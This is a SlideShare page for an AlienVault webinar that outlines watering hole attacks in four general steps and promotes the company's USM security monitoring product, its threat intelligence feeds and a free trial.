Live Demo: Get Complete Security
Visibility in Under 1 Hour
@AlienVault
1. Determine Target Group
• Attacker Identifies Websites to Target
- Based on observation or guessing
- Compro...
@AlienVault
2. Identify Vulnerabilities on those Websites
• Test web servers, ad servers, web apps, etc for vulnerabilitie...
@AlienVault
4. Sit in the Tall Grass and Wait for Targets to
Come to You
- Redirected from compromised site
- Eventually c...
@AlienVault
powered by
AV Labs Threat
Intelligence
USM
ASSET DISCOVERY
• Active Network Scanning
• Passive Network Scannin...
@AlienVault
AlienVault Labs threat intelligence:
Coordinated Analysis, actionable guidance
 Weekly updates that cover all...
@AlienVault
AlienVault Labs Threat Intelligence:
Coordinated Analysis, actionable Guidance
•Updates every 30 minutes
•200-...
@AlienVault
Unified Security Management
Complete. Simple. Affordable.
Delivery Options:
Hardware, Virtual, or Cloud-based ...
More Questions?
Email Hello@alienvault.com
NOW FOR SOME Q&A…
Test Drive AlienVault USM
Download a Free 30-Day Trial
http:/...
Upcoming SlideShare
Loading in …5
×

Watering Hole Attacks: Detect End-User Compromise Before the Damage is Done

1,324 views

Published on

Attackers are becoming increasingly skilled at planting malicious code on websites frequented by their desired targets, commonly called "watering hole" attacks. These can be very difficult to detect since they happen as users are going about their normal business. Join us a technical demo to watch a live example of this attack and how to detect it immediately using AlienVault USM.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,324
On SlideShare
0
From Embeds
0
Number of Embeds
17
Actions
Shares
0
Downloads
48
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Watering hole attack variations have been around for several years, but current techniques became visible in 2012

    They are used to target specific industries, regions, or companies by compromising the sites the target group uses frequently.

    Alternative to Phishing attacks, likely capture more victims than phishing

    For example, example from a couple of years ago targeted an iOS mobile developer forum and snared developers from Apple, Twitter, and Facebook
  • Delivers 8 coordinated rulesets, fueled by the collective power of the Open Threat Exchange, to drive the USM security capabilities and identify the latest threats, resulting in the broadest view of attacker techniques and effective defenses.
  • Watering Hole Attacks: Detect End-User Compromise Before the Damage is Done

    1. 1. Live Demo: Get Complete Security Visibility in Under 1 Hour
    2. 2. @AlienVault 1. Determine Target Group • Attacker Identifies Websites to Target - Based on observation or guessing - Compromising a well-known, legitimate site avoids blacklist issues • Examples - Compromise a desirable applet - Redirect visitors to malicious site - Inject Watering Hole Attack in 4 Easy Steps
    3. 3. @AlienVault 2. Identify Vulnerabilities on those Websites • Test web servers, ad servers, web apps, etc for vulnerabilities to exploit 3. Inject Threat into Website • For example, inject HTML or JavaScript to redirect victims to sites hosting malware Watering Hole Attack in 4 Easy Steps
    4. 4. @AlienVault 4. Sit in the Tall Grass and Wait for Targets to Come to You - Redirected from compromised site - Eventually compromised by download of malware Watering Hole Attack in 4 Easy Steps
    5. 5. @AlienVault powered by AV Labs Threat Intelligence USM ASSET DISCOVERY • Active Network Scanning • Passive Network Scanning • Asset Inventory • Host-based Software Inventory VULNERABILITY ASSESSMENT • Continuous Vulnerability Monitoring • Authenticated / Unauthenticated Active Scanning BEHAVIORAL MONITORING • Log Collection • Netflow Analysis • Service Availability Monitoring SECURITY INTELLIGENCE • SIEM Event Correlation • Incident Response THREAT DETECTION • Network IDS • Host IDS • Wireless IDS • File Integrity Monitoring USM Product Capabilities
    6. 6. @AlienVault AlienVault Labs threat intelligence: Coordinated Analysis, actionable guidance  Weekly updates that cover all your coordinated rule sets:  Network-based IDS signatures  Host-based IDS signatures  Asset discovery and inventory database updates  Vulnerability database updates  Event correlation rules  Report modules and templates  Incident response templates / “how to” guidance for each alarm  Plug-ins to accommodate new data sources  Fueled by the collective power of the AlienVault’s Open Threat Exchange (OTX)
    7. 7. @AlienVault AlienVault Labs Threat Intelligence: Coordinated Analysis, actionable Guidance •Updates every 30 minutes •200-350,000 IP validated daily •8,000 Collection points •140 Countries
    8. 8. @AlienVault Unified Security Management Complete. Simple. Affordable. Delivery Options: Hardware, Virtual, or Cloud-based appliances Open-Source version (OSSIM) also available AlienVault USM provides the five essential security capabilities in one, pre-integrated platform  Unified Security Management (USM) Platform  AlienVault Labs Threat Intelligence  AlienVault Open Threat Exchange
    9. 9. More Questions? Email Hello@alienvault.com NOW FOR SOME Q&A… Test Drive AlienVault USM Download a Free 30-Day Trial http://www.alienvault.com/free-trial Try our Interactive Demo Site http://www.alienvault.com/live-demo-site

    ×